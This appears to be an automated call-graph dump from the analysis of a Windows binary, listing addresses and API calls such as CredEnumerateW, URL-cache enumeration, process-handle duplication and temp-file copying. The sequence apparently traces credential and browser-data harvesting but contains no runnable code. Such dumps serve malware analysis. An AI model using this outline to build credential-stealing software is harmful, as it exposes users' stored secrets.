calls 38519->38919 38521->38322 38522->38324 38523->38322 38524->38317 38526 40c775 38525->38526 38921 40b1ab ??3@YAXPAX ??3@YAXPAX 38526->38921 38528 40c788 38922 40b1ab ??3@YAXPAX ??3@YAXPAX 38528->38922 38530 40c790 38923 40b1ab ??3@YAXPAX ??3@YAXPAX 38530->38923 38532 40c798 38533 40aa04 ??3@YAXPAX 38532->38533 38534 40c7a0 38533->38534 38924 40c274 memset 38534->38924 38539 40a8ab 9 API calls 38540 40c7c3 38539->38540 38541 40a8ab 9 API calls 38540->38541 38542 40c7d0 38541->38542 38953 40c3c3 38542->38953 38546 40c7e5 38547 40c877 38546->38547 38548 40c86c 38546->38548 38554 40c634 49 API calls 38546->38554 38978 40a706 38546->38978 38555 40bdb0 38547->38555 38995 4053fe 39 API calls 38548->38995 38554->38546 39185 404363 38555->39185 38558 40bf5d 39205 40440c 38558->39205 38560 40bdee 38560->38558 38563 40b2cc 27 API calls 38560->38563 38561 40bddf CredEnumerateW 38561->38560 38564 40be02 wcslen 38563->38564 38564->38558 38566 40be1e 38564->38566 38565 40be26 _wcsncoll 38565->38566 38566->38558 38566->38565 38569 40be7d memset 38566->38569 38570 40bea7 memcpy 38566->38570 38571 40bf11 wcschr 38566->38571 38572 40b2cc 27 API calls 38566->38572 38574 40bf43 LocalFree 38566->38574 39208 40bd5d 28 API calls 38566->39208 39209 404423 38566->39209 38569->38566 38569->38570 38570->38566 38570->38571 38571->38566 38573 40bef6 _wcsnicmp 38572->38573 38573->38566 38573->38571 38574->38566 38575 4135f7 39222 4135e0 38575->39222 38578 40b2cc 27 API calls 38579 41360d 38578->38579 38580 40a804 8 API calls 38579->38580 38581 413613 38580->38581 38609 40399d 38608->38609 39251 403a16 38609->39251 38611 403a09 39265 40b1ab ??3@YAXPAX ??3@YAXPAX 38611->39265 38613 403a12 wcsrchr 38613->38345 38614 4039a3 38614->38611 38617 4039f4 38614->38617 39262 40a02c CreateFileW 38614->39262 38617->38611 38618 4099c6 2 API calls 38617->38618 38618->38611 38620 414c2e 16 API calls 38619->38620 38621 404048 38620->38621 38622 414c2e 16 API calls 38621->38622 38623 404056 38622->38623 38624 409d1f 6 API calls 38623->38624 38625 404073 38624->38625 38626 409d1f 6 API calls 38625->38626 38627 40408e 38626->38627 38628 409d1f 6 API calls 38627->38628 38629 4040a6 38628->38629 38630 403af5 20 API calls 38629->38630 38631 4040ba 38630->38631 38632 403af5 20 API calls 38631->38632 38633 4040cb 38632->38633 39292 40414f memset 38633->39292 38635 404140 39306 40b1ab ??3@YAXPAX ??3@YAXPAX 38635->39306 38637 4040ec memset 38640 4040e0 38637->38640 38638 404148 38638->38401 38639 4099c6 2 API calls 38639->38640 38640->38635 38640->38637 38640->38639 38641 40a8ab 9 API calls 38640->38641 38641->38640 39319 40a6e6 WideCharToMultiByte 38642->39319 38644 4087ed 39320 4095d9 memset 38644->39320 38694 40b633 ??3@YAXPAX 38693->38694 38695 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38694->38695 38696 413f00 Process32NextW 38695->38696 38697 413da5 OpenProcess 38696->38697 38698 413f17 CloseHandle 38696->38698 38699 413df3 memset 38697->38699 38704 413eb0 38697->38704 38698->38439 39631 413f27 38699->39631 38701 413ebf ??3@YAXPAX 38701->38704 38702 4099f4 3 API calls 38702->38704 38704->38696 38704->38701 38704->38702 38705 413e37 GetModuleHandleW 38706 413e1f 38705->38706 38707 413e46 GetProcAddress 38705->38707 38706->38705 39636 413959 38706->39636 39652 413ca4 38706->39652 38707->38706 38709 413ea2 CloseHandle 38709->38704 38711 414c2e 16 API calls 38710->38711 38712 403eb7 38711->38712 38713 414c2e 16 API calls 38712->38713 38714 403ec5 38713->38714 38715 409d1f 6 API calls 38714->38715 38716 403ee2 38715->38716 38717 409d1f 6 API calls 38716->38717 38718 403efd 38717->38718 38719 409d1f 6 API calls 38718->38719 38720 403f15 38719->38720 38721 403af5 20 API calls 38720->38721 38722 403f29 38721->38722 38723 403af5 20 API calls 38722->38723 38724 403f3a 38723->38724 38725 40414f 33 API calls 38724->38725 38730 403f4f 38725->38730 38726 403faf 39666 40b1ab ??3@YAXPAX ??3@YAXPAX 38726->39666 38728 403f5b memset 38728->38730 38729 403fb7 38729->38385 38730->38726 38730->38728 38731 4099c6 2 API calls 38730->38731 38732 40a8ab 9 API calls 38730->38732 38731->38730 38732->38730 38734 414c2e 16 API calls 38733->38734 38735 403d26 38734->38735 38736 414c2e 16 API calls 38735->38736 38737 403d34 38736->38737 38738 409d1f 6 API calls 38737->38738 38739 403d51 38738->38739 38740 409d1f 6 API calls 38739->38740 38741 403d6c 38740->38741 38742 409d1f 6 API calls 38741->38742 38743 403d84 38742->38743 38744 403af5 20 API calls 38743->38744 38745 403d98 38744->38745 38746 403af5 20 API calls 38745->38746 38747 403da9 38746->38747 38748 40414f 33 API calls 38747->38748 38749 403dbe 38748->38749 38750 403e1e 38749->38750 38751 403dca memset 38749->38751 38754 4099c6 2 API calls 38749->38754 38755 40a8ab 9 API calls 38749->38755 39667 40b1ab ??3@YAXPAX ??3@YAXPAX 38750->39667 38751->38749 38753 403e26 38753->38389 38754->38749 38755->38749 38757 414b81 9 API calls 38756->38757 38758 414c40 38757->38758 38759 414c73 memset 38758->38759 39668 409cea 38758->39668 38760 414c94 38759->38760 39671 414592 RegOpenKeyExW 38760->39671 38763 414c64 38763->38379 38765 414cc1 38766 414cf4 wcscpy 38765->38766 39672 414bb0 wcscpy 38765->39672 38766->38763 38768 414cd2 39673 4145ac RegQueryValueExW 38768->39673 38770 414ce9 RegCloseKey 38770->38766 38772 409d62 38771->38772 38773 409d43 wcscpy 38771->38773 38772->38421 38774 409719 2 API calls 38773->38774 38775 409d51 wcscat 38774->38775 38775->38772 38777 40aebe FindClose 38776->38777 38778 40ae21 38777->38778 38779 4099c6 2 API calls 38778->38779 38780 40ae35 38779->38780 38781 409d1f 6 API calls 38780->38781 38782 40ae49 38781->38782 38782->38456 38784 40ade0 38783->38784 38785 40ae0f 38783->38785 38784->38785 38786 40ade7 wcscmp 38784->38786 38785->38456 38786->38785 38787 40adfe wcscmp 38786->38787 38787->38785 38789 40ae18 9 API calls 38788->38789 38795 4453c4 38789->38795 38790 40ae51 9 API calls 38790->38795 38791 4453f3 38793 40aebe FindClose 38791->38793 38792 40add4 2 API calls 38792->38795 38794 4453fe 38793->38794 38794->38456 38795->38790 38795->38791 38795->38792 38796 445403 253 API calls 38795->38796 38796->38795 38798 40ae7b FindNextFileW 38797->38798 38799 40ae5c FindFirstFileW 38797->38799 38800 40ae94 38798->38800 38801 40ae8f 38798->38801 38799->38800 38803 409d1f 6 API calls 38800->38803 38804 40aeb6 38800->38804 38802 40aebe FindClose 38801->38802 38802->38800 38803->38804 38804->38456 38806->38442 38807->38423 38808->38423 38809->38457 38811 409c89 38810->38811 38811->38479 38812->38509 38814 413d39 38813->38814 38815 413d2f FreeLibrary 38813->38815 38816 40b633 ??3@YAXPAX 38814->38816 38815->38814 38817 413d42 38816->38817 38818 40b633 ??3@YAXPAX 38817->38818 38819 413d4a 38818->38819 38819->38338 38820->38342 38821->38391 38822->38405 38824 44db70 38823->38824 38825 40b6fc memset 38824->38825 38826 409c70 2 API calls 38825->38826 38827 40b732 wcsrchr 38826->38827 38828 40b743 38827->38828 38829 40b746 memset 38827->38829 38828->38829 38830 40b2cc 27 API calls 38829->38830 38831 40b76f 38830->38831 38832 409d1f 6 API calls 38831->38832 38833 40b783 38832->38833 39674 409b98 GetFileAttributesW 38833->39674 38835 40b792 38836 40b7c2 38835->38836 38837 409c70 2 API calls 38835->38837 39675 40bb98 38836->39675 38839 40b7a5 38837->38839 38841 40b2cc 27 API calls 38839->38841 38845 40b7b2 38841->38845 38842 40b837 FindCloseChangeNotification 38844 40b83e memset 38842->38844 38843 40b817 39709 409a45 GetTempPathW 38843->39709 39708 40a6e6 WideCharToMultiByte 38844->39708 38848 409d1f 6 API calls 38845->38848 38848->38836 38849 40b827 CopyFileW 38849->38844 38850 40b866 38851 444432 121 API calls 38850->38851 38852 40b879 38851->38852 38853 40bad5 38852->38853 38854 40b273 27 API calls 38852->38854 38855 40baeb 38853->38855 38856 40bade DeleteFileW 38853->38856 38857 40b89a 38854->38857 38858 40b04b ??3@YAXPAX 38855->38858 38856->38855 38859 438552 134 API calls 38857->38859 38860 40baf3 38858->38860 38861 40b8a4 38859->38861 38860->38415 38862 40bacd 38861->38862 38864 4251c4 137 API calls 38861->38864 38863 443d90 111 API calls 38862->38863 38863->38853 38887 40b8b8 38864->38887 38865 40bac6 39721 424f26 123 API calls 38865->39721 38866 40b8bd memset 39712 425413 17 API calls 38866->39712 38869 425413 17 API calls 38869->38887 38872 40a71b MultiByteToWideChar 38872->38887 38873 40a734 MultiByteToWideChar 38873->38887 38876 40b9b5 memcmp 38876->38887 38877 4099c6 2 API calls 38877->38887 38878 404423 37 API calls 38878->38887 38880 40bb3e memset memcpy 39722 40a734 MultiByteToWideChar 38880->39722 38881 4251c4 137 API calls 38881->38887 38884 40bb88 LocalFree 38884->38887 38887->38865 38887->38866 38887->38869 38887->38872 38887->38873 38887->38876 38887->38877 38887->38878 38887->38880 38887->38881 38888 40ba5f memcmp 38887->38888 39713 4253ef 16 API calls 38887->39713 39714 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38887->39714 39715 4253af 17 API calls 38887->39715 39716 4253cf 17 API calls 38887->39716 39717 447280 memset 38887->39717 39718 447960 memset memcpy memcpy memcpy 38887->39718 39719 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38887->39719 39720 447920 memcpy memcpy memcpy 38887->39720 38888->38887 38889->38417 38891 40aed1 38890->38891 38892 40aec7 FindClose 38890->38892 38891->38350 38892->38891 38894 4099d7 38893->38894 38895 4099da memcpy 38893->38895 38894->38895 38895->38400 38897 40b2cc 27 API calls 38896->38897 38898 44543f 38897->38898 38899 409d1f 6 API calls 38898->38899 38900 44544f 38899->38900 39814 409b98 GetFileAttributesW 38900->39814 38902 44545e 38903 445476 38902->38903 38904 40b6ef 252 API calls 38902->38904 38905 40b2cc 27 API calls 38903->38905 38904->38903 38906 445482 38905->38906 38907 409d1f 6 API calls 38906->38907 38908 445492 38907->38908 39815 409b98 GetFileAttributesW 38908->39815 38910 4454a1 38911 4454b9 38910->38911 38912 40b6ef 252 API calls 38910->38912 38911->38431 38912->38911 38913->38430 38914->38447 38915->38453 38916->38490 38917->38472 38918->38517 38919->38517 38920->38500 38921->38528 38922->38530 38923->38532 38925 414c2e 16 API calls 38924->38925 38926 40c2ae 38925->38926 38996 40c1d3 38926->38996 38931 40c3be 38948 40a8ab 38931->38948 38932 40afcf 2 API calls 38933 40c2fd FindFirstUrlCacheEntryW 38932->38933 38934 40c3b6 38933->38934 38935 40c31e wcschr 38933->38935 38936 40b04b ??3@YAXPAX 38934->38936 38937 40c331 38935->38937 38938 40c35e FindNextUrlCacheEntryW 38935->38938 38936->38931 38939 40a8ab 9 API calls 38937->38939 38938->38935 38940 40c373 GetLastError 38938->38940 38943 40c33e wcschr 38939->38943 38941 40c3ad FindCloseUrlCache 38940->38941 38942 40c37e 38940->38942 38941->38934 38944 40afcf 2 API calls 38942->38944 38943->38938 38945 40c34f 38943->38945 38946 40c391 FindNextUrlCacheEntryW 38944->38946 38947 40a8ab 9 API calls 38945->38947 38946->38935 38946->38941 38947->38938 39112 40a97a 38948->39112 38951 40a8cc 38951->38539 38952 40a8d0 7 API calls 38952->38951 39117 40b1ab ??3@YAXPAX ??3@YAXPAX 38953->39117 38955 40c3dd 38956 40b2cc 27 API calls 38955->38956 38957 40c3e7 38956->38957 39118 414592 RegOpenKeyExW 38957->39118 38959 40c3f4 38960 40c50e 38959->38960 38961 40c3ff 38959->38961 38975 405337 38960->38975 38962 40a9ce 4 API calls 38961->38962 38963 40c418 memset 38962->38963 39119 40aa1d 38963->39119 38966 40c471 38968 40c47a _wcsupr 38966->38968 38967 40c505 RegCloseKey 38967->38960 38969 40a8d0 7 API calls 38968->38969 38970 40c498 38969->38970 38971 40a8d0 7 API calls 38970->38971 38972 40c4ac memset 38971->38972 38973 40aa1d 38972->38973 38974 40c4e4 RegEnumValueW 38973->38974 38974->38967 38974->38968 39121 405220 38975->39121 38979 4099c6 2 API calls 38978->38979 38980 40a714 _wcslwr 38979->38980 38981 40c634 38980->38981 39178 405361 38981->39178 38984 40c65c wcslen 39181 4053b6 39 API calls 38984->39181 38985 40c71d wcslen 38985->38546 38987 40c677 38988 40c713 38987->38988 39182 40538b 39 API calls 38987->39182 39184 4053df 39 API calls 38988->39184 38991 40c6a5 38991->38988 38992 40c6a9 memset 38991->38992 38993 40c6d3 38992->38993 39183 40c589 43 API calls 38993->39183 38995->38547 38997 40ae18 9 API calls 38996->38997 39003 40c210 38997->39003 38998 40ae51 9 API calls 38998->39003 38999 40c264 39000 40aebe FindClose 38999->39000 39002 40c26f 39000->39002 39001 40add4 2 API calls 39001->39003 39008 40e5ed memset memset 39002->39008 39003->38998 39003->38999 39003->39001 39004 40c231 _wcsicmp 39003->39004 39005 40c1d3 35 API calls 39003->39005 39004->39003 39006 40c248 39004->39006 39005->39003 39021 40c084 22 API calls 39006->39021 39009 414c2e 16 API calls 39008->39009 39010 40e63f 39009->39010 39011 409d1f 6 API calls 39010->39011 39012 40e658 39011->39012 39022 409b98 GetFileAttributesW 39012->39022 39014 40e667 39015 40e680 39014->39015 39017 409d1f 6 API calls 39014->39017 39023 409b98 GetFileAttributesW 39015->39023 39017->39015 39018 40e68f 39019 40c2d8 39018->39019 39024 40e4b2 39018->39024 39019->38931 39019->38932 39021->39003 39022->39014 39023->39018 39045 40e01e 39024->39045 39026 40e593 39028 40e5b0 39026->39028 39029 40e59c DeleteFileW 39026->39029 39027 40e521 39027->39026 39068 40e175 39027->39068 39030 40b04b ??3@YAXPAX 39028->39030 39029->39028 39031 40e5bb 39030->39031 39033 40e5c4 CloseHandle 39031->39033 39034 40e5cc 39031->39034 39033->39034 39036 40b633 ??3@YAXPAX 39034->39036 39035 40e573 39037 40e584 39035->39037 39038 40e57c FindCloseChangeNotification 39035->39038 39039 40e5db 39036->39039 39111 40b1ab ??3@YAXPAX ??3@YAXPAX 39037->39111 39038->39037 39042 40b633 ??3@YAXPAX 39039->39042 39041 40e540 39041->39035 39088 40e2ab 39041->39088 39043 40e5e3 39042->39043 39043->39019 39046 406214 22 API calls 39045->39046 39047 40e03c 39046->39047 39048 40e16b 39047->39048 39049 40dd85 74 API calls 39047->39049 39048->39027 39050 40e06b 39049->39050 39050->39048 39051 40afcf ??2@YAPAXI ??3@YAXPAX 39050->39051 39052 40e08d OpenProcess 39051->39052 39053 40e0a4 GetCurrentProcess DuplicateHandle 39052->39053 39057 40e152 39052->39057 39054 40e0d0 GetFileSize 39053->39054 39055 40e14a CloseHandle 39053->39055 39058 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39054->39058 39055->39057 39056 40e160 39060 40b04b ??3@YAXPAX 39056->39060 39057->39056 39059 406214 22 API calls 39057->39059 39061 40e0ea 39058->39061 39059->39056 39060->39048 39062 4096dc CreateFileW 39061->39062 39063 40e0f1 CreateFileMappingW 39062->39063 39064 40e140 CloseHandle CloseHandle 39063->39064 39065 40e10b MapViewOfFile 39063->39065 39064->39055 39066 40e13b FindCloseChangeNotification 39065->39066 39067 40e11f WriteFile UnmapViewOfFile 39065->39067 39066->39064 39067->39066 39069 40e18c 39068->39069 39070 406b90 11 API calls 39069->39070 39071 40e19f 39070->39071 39072 40e1a7 memset 39071->39072 39073 40e299 39071->39073 39078 40e1e8 39072->39078 39074 4069a3 ??3@YAXPAX ??3@YAXPAX 39073->39074 39075 40e2a4 39074->39075 39075->39041 39076 406e8f 13 API calls 39076->39078 39077 406b53 SetFilePointerEx ReadFile 39077->39078 39078->39076 39078->39077 39079 40e283 39078->39079 39080 40dd50 _wcsicmp 39078->39080 39084 40742e 8 API calls 39078->39084 39085 40aae3 wcslen wcslen _memicmp 39078->39085 39086 40e244 _snwprintf 39078->39086 39081 40e291 39079->39081 39082 40e288 ??3@YAXPAX 39079->39082 39080->39078 39083 40aa04 ??3@YAXPAX 39081->39083 39082->39081 39083->39073 39084->39078 39085->39078 39087 40a8d0 7 API calls 39086->39087 39087->39078 39089 40e2c2 39088->39089 39090 406b90 11 API calls 39089->39090 39101 40e2d3 39090->39101 39091 40e4a0 39092 4069a3 ??3@YAXPAX ??3@YAXPAX 39091->39092 39094 40e4ab 39092->39094 39093 406e8f 13 API calls 39093->39101 39094->39041 39095 406b53 SetFilePointerEx ReadFile 39095->39101 39096 40e489 39097 40aa04 ??3@YAXPAX 39096->39097 39099 40e491 39097->39099 39098 40dd50 _wcsicmp 39098->39101 39099->39091 39100 40e497 ??3@YAXPAX 39099->39100 39100->39091 39101->39091 39101->39093 39101->39095 39101->39096 39101->39098 39102 40dd50 _wcsicmp 39101->39102 39105 40742e 8 API calls 39101->39105 39106 40e3e0 memcpy 39101->39106 39107 40e3b3 wcschr 39101->39107 39108 40e3fb memcpy 39101->39108 39109 40e416 memcpy 39101->39109 39110 40e431 memcpy 39101->39110 39103 40e376 memset 39102->39103 39104 40aa29 6 API calls 39103->39104 39104->39101 39105->39101 39106->39101 39107->39101 39108->39101 39109->39101 39110->39101 39111->39026 39114 40a980 39112->39114 39113 40a8bb 39113->38951 39113->38952 39114->39113 39115 40a995 _wcsicmp 39114->39115 39116 40a99c wcscmp 39114->39116 39115->39114 39116->39114 39117->38955 39118->38959 39120 40aa23 RegEnumValueW 39119->39120 39120->38966 39120->38967 39122 405335 39121->39122 39123 40522a 39121->39123 39122->38546 39124 40b2cc 27 API calls 39123->39124 39125 405234 39124->39125 39126 40a804 8 API calls 39125->39126 39127 40523a 39126->39127 39166 40b273 39127->39166 39129 405248 _mbscpy _mbscat GetProcAddress 39130 40b273 27 API calls 39129->39130 39131 405279 39130->39131 39169 405211 GetProcAddress 39131->39169 39133 405282 39134 40b273 27 API calls 39133->39134 39135 40528f 39134->39135 39170 405211 GetProcAddress 39135->39170 39137 405298 39138 40b273 27 API calls 39137->39138 39139 4052a5 39138->39139 39171 405211 GetProcAddress 39139->39171 39167 40b58d 27 API calls 39166->39167 39168 40b18c 39167->39168 39168->39129 39169->39133 39170->39137 39179 405220 39 API calls 39178->39179 39180 405369 39179->39180 39180->38984 39180->38985 39181->38987 39182->38991 39183->38988 39184->38985 39186 40440c FreeLibrary 39185->39186 39187 40436d 39186->39187 39188 40a804 8 API calls 39187->39188 39189 404377 39188->39189 39190 404383 39189->39190 39191 404405 39189->39191 39192 40b273 27 API calls 39190->39192 39191->38558 39191->38560 39191->38561 39193 40438d GetProcAddress 39192->39193 39194 40b273 27 API calls 39193->39194 39195 4043a7 GetProcAddress 39194->39195 39196 40b273 27 API calls 39195->39196 39197 4043ba GetProcAddress 39196->39197 39198 40b273 27 API calls 39197->39198 39199 4043ce GetProcAddress 39198->39199 39200 40b273 27 API calls 39199->39200 39201 4043e2 GetProcAddress 39200->39201 39206 404413 FreeLibrary 39205->39206 39207 40441e 39205->39207 39206->39207 39207->38575 39208->38566 39210 40442e 39209->39210 39211 40447e 39209->39211 39212 40b2cc 27 API calls 39210->39212 39211->38566 39213 404438 39212->39213 39214 40a804 8 API calls 39213->39214 39215 40443e 39214->39215 39223 4135f6 39222->39223 39224 4135eb FreeLibrary 39222->39224 39223->38578 39224->39223 39252 403a29 39251->39252 39266 403bed memset memset 39252->39266 39254 403ae7 39279 40b1ab ??3@YAXPAX ??3@YAXPAX 39254->39279 39255 403a3f memset 39261 403a2f 39255->39261 39257 403aef 39257->38614 39258 409b98 GetFileAttributesW 39258->39261 39259 40a8d0 7 API calls 39259->39261 39260 409d1f 6 API calls 39260->39261 39261->39254 39261->39255 39261->39258 39261->39259 39261->39260 39263 40a051 GetFileTime FindCloseChangeNotification 39262->39263 39264 4039ca CompareFileTime 39262->39264 39263->39264 39264->38614 39265->38613 39267 414c2e 16 API calls 39266->39267 39268 403c38 39267->39268 39269 409719 2 API calls 39268->39269 39270 403c3f wcscat 39269->39270 39271 414c2e 16 API calls 39270->39271 39272 403c61 39271->39272 39273 409719 2 API calls 39272->39273 39274 403c68 wcscat 39273->39274 39280 403af5 39274->39280 39277 403af5 20 API calls 39278 403c95 39277->39278 39278->39261 39279->39257 39281 403b02 39280->39281 39282 40ae18 9 API calls 39281->39282 39290 403b37 39282->39290 39283 403bdb 39285 40aebe FindClose 39283->39285 39284 40add4 wcscmp wcscmp 39284->39290 39286 403be6 39285->39286 39286->39277 39287 40ae18 9 API calls 39287->39290 39288 40ae51 9 API calls 39288->39290 39289 40aebe FindClose 39289->39290 39290->39283 39290->39284 39290->39287 39290->39288 39290->39289 39291 40a8d0 7 API calls 39290->39291 39291->39290 39293 409d1f 6 API calls 39292->39293 39294 404190 39293->39294 39307 409b98 GetFileAttributesW 39294->39307 39296 40419c 39297 4041a7 6 API calls 39296->39297 39298 40435c 39296->39298 39299 40424f 39297->39299 39298->38640 39299->39298 39301 40425e memset 39299->39301 39303 409d1f 6 API calls 39299->39303 39304 40a8ab 9 API calls 39299->39304 39308 414842 39299->39308 39301->39299 39302 404296 wcscpy 39301->39302 39302->39299 39303->39299 39305 4042b6 memset memset _snwprintf wcscpy 39304->39305 39305->39299 39306->38638 39307->39296 39311 41443e 39308->39311 39310 414866 39310->39299 39312 41444b 39311->39312 39313 414451 39312->39313 39314 4144a3 GetPrivateProfileStringW 39312->39314 39315 414491 39313->39315 39316 414455 wcschr 39313->39316 39314->39310 39317 414495 WritePrivateProfileStringW 39315->39317 39316->39315 39318 414463 _snwprintf 39316->39318 39317->39310 39318->39317 39319->38644 39321 40b2cc 27 API calls 39320->39321 39322 409615 39321->39322 39323 409d1f 6 API calls 39322->39323 39324 409625 39323->39324 39349 409b98 GetFileAttributesW 39324->39349 39326 409634 39349->39326 39658 413f4f 39631->39658 39634 413f37 K32GetModuleFileNameExW 39635 413f4a 39634->39635 39635->38706 39637 413969 wcscpy 39636->39637 39638 41396c wcschr 39636->39638 39650 413a3a 39637->39650 39638->39637 39640 41398e 39638->39640 39663 4097f7 wcslen wcslen _memicmp 39640->39663 39642 41399a 39643 4139a4 memset 39642->39643 39644 4139e6 39642->39644 39664 409dd5 GetWindowsDirectoryW wcscpy 39643->39664 39646 413a31 wcscpy 39644->39646 39647 4139ec memset 39644->39647 39646->39650 39665 409dd5 GetWindowsDirectoryW wcscpy 39647->39665 39648 4139c9 wcscpy wcscat 39648->39650 39650->38706 39651 413a11 memcpy wcscat 39651->39650 39653 413cb0 GetModuleHandleW 39652->39653 39654 413cda 39652->39654 39653->39654 39655 413cbf GetProcAddress 39653->39655 39656 413ce3 GetProcessTimes 39654->39656 39657 413cf6 39654->39657 39655->39654 39656->38709 39657->38709 39659 413f2f 39658->39659 39660 413f54 39658->39660 39659->39634 39659->39635 39661 40a804 8 API calls 39660->39661 39662 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39661->39662 39662->39659 39663->39642 39664->39648 39665->39651 39666->38729 39667->38753 39669 409cf9 GetVersionExW 39668->39669 39670 409d0a 39668->39670 39669->39670 39670->38759 39670->38763 39671->38765 39672->38768 39673->38770 39674->38835 39676 40bba5 39675->39676 39723 40cc26 39676->39723 39679 40bd4b 39744 40cc0c 39679->39744 39684 40b2cc 27 API calls 39685 40bbef 39684->39685 39751 40ccf0 _wcsicmp 39685->39751 39687 40bbf5 39687->39679 39752 40ccb4 6 API calls 39687->39752 39689 40bc26 39690 40cf04 17 API calls 39689->39690 39691 40bc2e 39690->39691 39692 40bd43 39691->39692 39693 40b2cc 27 API calls 39691->39693 39694 40cc0c 4 API calls 39692->39694 39695 40bc40 39693->39695 39694->39679 39753 40ccf0 _wcsicmp 39695->39753 39697 40bc46 39697->39692 39698 40bc61 memset memset WideCharToMultiByte 39697->39698 39754 40103c strlen 39698->39754 39700 40bcc0 39701 40b273 27 API calls 39700->39701 39702 40bcd0 memcmp 39701->39702 39702->39692 39703 40bce2 39702->39703 39704 404423 37 API calls 39703->39704 39705 40bd10 39704->39705 39705->39692 39706 40bd3a LocalFree 39705->39706 39707 40bd1f memcpy 39705->39707 39706->39692 39707->39706 39708->38850 39710 409a74 GetTempFileNameW 39709->39710 39711 409a66 GetWindowsDirectoryW 39709->39711 39710->38849 39711->39710 39712->38887 39713->38887 39714->38887 39715->38887 39716->38887 39717->38887 39718->38887 39719->38887 39720->38887 39721->38862 39722->38884 39755 4096c3 CreateFileW 39723->39755 39725 40cc34 39726 40cc3d GetFileSize 39725->39726 39734 40bbca 39725->39734 39727 40afcf 2 API calls 39726->39727 39728 40cc64 39727->39728 39756 40a2ef ReadFile 39728->39756 39730 40cc71 39757 40ab4a MultiByteToWideChar 39730->39757 39732 40cc95 FindCloseChangeNotification 39733 40b04b ??3@YAXPAX 39732->39733 39733->39734 39734->39679 39735 40cf04 39734->39735 39736 40b633 ??3@YAXPAX 39735->39736 39737 40cf14 39736->39737 39763 40b1ab ??3@YAXPAX ??3@YAXPAX 39737->39763 39739 40bbdd 39739->39679 39739->39684 39740 40cf1b 39740->39739 39742 40cfef 39740->39742 39764 40cd4b 39740->39764 39743 40cd4b 14 API calls 39742->39743 39743->39739 39745 40b633 ??3@YAXPAX 39744->39745 39746 40cc15 39745->39746 39747 40aa04 ??3@YAXPAX 39746->39747 39748 40cc1d 39747->39748 39813 40b1ab ??3@YAXPAX ??3@YAXPAX 39748->39813 39750 40b7d4 memset CreateFileW 39750->38842 39750->38843 39751->39687 39752->39689 39753->39697 39754->39700 39755->39725 39756->39730 39758 40ab6b 39757->39758 39762 40ab93 39757->39762 39759 40a9ce 4 API calls 39758->39759 39760 40ab74 39759->39760 39761 40ab7c MultiByteToWideChar 39760->39761 39761->39762 39762->39732 39763->39740 39765 40cd7b 39764->39765 39798 40aa29 39765->39798 39767 40cef5 39768 40aa04 ??3@YAXPAX 39767->39768 39769 40cefd 39768->39769 39769->39740 39771 40aa29 6 API calls 39772 40ce1d 39771->39772 39773 40aa29 6 API calls 39772->39773 39774 40ce3e 39773->39774 39775 40ce6a 39774->39775 39806 40abb7 wcslen memmove 39774->39806 39776 40ce9f 39775->39776 39809 40abb7 wcslen memmove 39775->39809 39778 40a8d0 7 API calls 39776->39778 39781 40ceb5 39778->39781 39779 40ce56 39807 40aa71 wcslen 39779->39807 39788 40a8d0 7 API calls 39781->39788 39783 40ce8b 39810 40aa71 wcslen 39783->39810 39785 40ce5e 39808 40abb7 wcslen memmove 39785->39808 39786 40ce93 39811 40abb7 wcslen memmove 39786->39811 39790 40cecb 39788->39790 39812 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39790->39812 39792 40cedd 39793 40aa04 ??3@YAXPAX 39792->39793 39794 40cee5 39793->39794 39795 40aa04 ??3@YAXPAX 39794->39795 39796 40ceed 39795->39796 39797 40aa04 ??3@YAXPAX 39796->39797 39797->39767 39799 40aa33 39798->39799 39800 40aa63 39798->39800 39801 40aa44 39799->39801 39802 40aa38 wcslen 39799->39802 39800->39767 39800->39771 39803 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39801->39803 39802->39801 39804 40aa4d 39803->39804 39804->39800 39805 40aa51 memcpy 39804->39805 39805->39800 39806->39779 39807->39785 39808->39775 39809->39783 39810->39786 39811->39776 39812->39792 39813->39750 39814->38902 39815->38910 39892 44def7 39893 44df07 39892->39893 39894 44df00 ??3@YAXPAX 39892->39894 39895 44df17 39893->39895 39896 44df10 ??3@YAXPAX 39893->39896 39894->39893 39897 44df27 39895->39897 39898 44df20 ??3@YAXPAX 39895->39898 39896->39895 39899 44df37 39897->39899 39900 44df30 ??3@YAXPAX 39897->39900 39898->39897 39900->39899 37669 44dea5 37670 44deb5 FreeLibrary 37669->37670 37671 44dec3 37669->37671 37670->37671 39901 4148b6 FindResourceW 39902 4148f9 39901->39902 39903 4148cf SizeofResource 39901->39903 39903->39902 39904 4148e0 LoadResource 39903->39904 39904->39902 39905 4148ee LockResource 39904->39905 39905->39902 39906 44197d 147 API calls 37848 415304 ??3@YAXPAX 39816 427533 39820 427548 39816->39820 39829 425711 39816->39829 39817 4259da 39873 416760 11 API calls 39817->39873 39819 4275cb 39853 425506 39819->39853 39820->39819 39827 429b7a 39820->39827 39821 4260dd 39874 424251 120 API calls 39821->39874 39822 4259c2 39849 425ad6 39822->39849 39867 415c56 11 API calls 39822->39867 39879 4446ce 11 API calls 39827->39879 39829->39817 39829->39822 39832 429a4d 39829->39832 39835 422aeb memset memcpy memcpy 39829->39835 39837 4260a1 39829->39837 39843 429ac1 39829->39843 39852 425a38 39829->39852 39863 4227f0 memset memcpy 39829->39863 39864 422b84 15 API calls 39829->39864 39865 422b5d memset memcpy memcpy 39829->39865 39866 422640 13 API calls 39829->39866 39868 4241fc 11 API calls 39829->39868 39869 42413a 90 API calls 39829->39869 39833 429a66 39832->39833 39834 429a9b 39832->39834 39875 415c56 11 API calls 39833->39875 39839 429a96 39834->39839 39877 416760 11 API calls 39834->39877 39835->39829 39872 415c56 11 API calls 39837->39872 39878 424251 120 API calls 39839->39878 39842 429a7a 39876 416760 11 API calls 39842->39876 39843->39817 39843->39849 39880 415c56 11 API calls 39843->39880 39852->39822 39870 422640 13 API calls 39852->39870 39871 4226e0 12 API calls 39852->39871 39854 425554 39853->39854 39855 42554d 39853->39855 39882 422586 12 API calls 39854->39882 39881 423b34 103 API calls 39855->39881 39858 425567 39859 4255ba 39858->39859 39860 42556c memset 39858->39860 39859->39829 39861 425596 39860->39861 39861->39859 39862 4255a4 memset 39861->39862 39862->39859 39863->39829 39864->39829 39865->39829 39866->39829 39867->39817 39868->39829 39869->39829 39870->39852 39871->39852 39872->39817 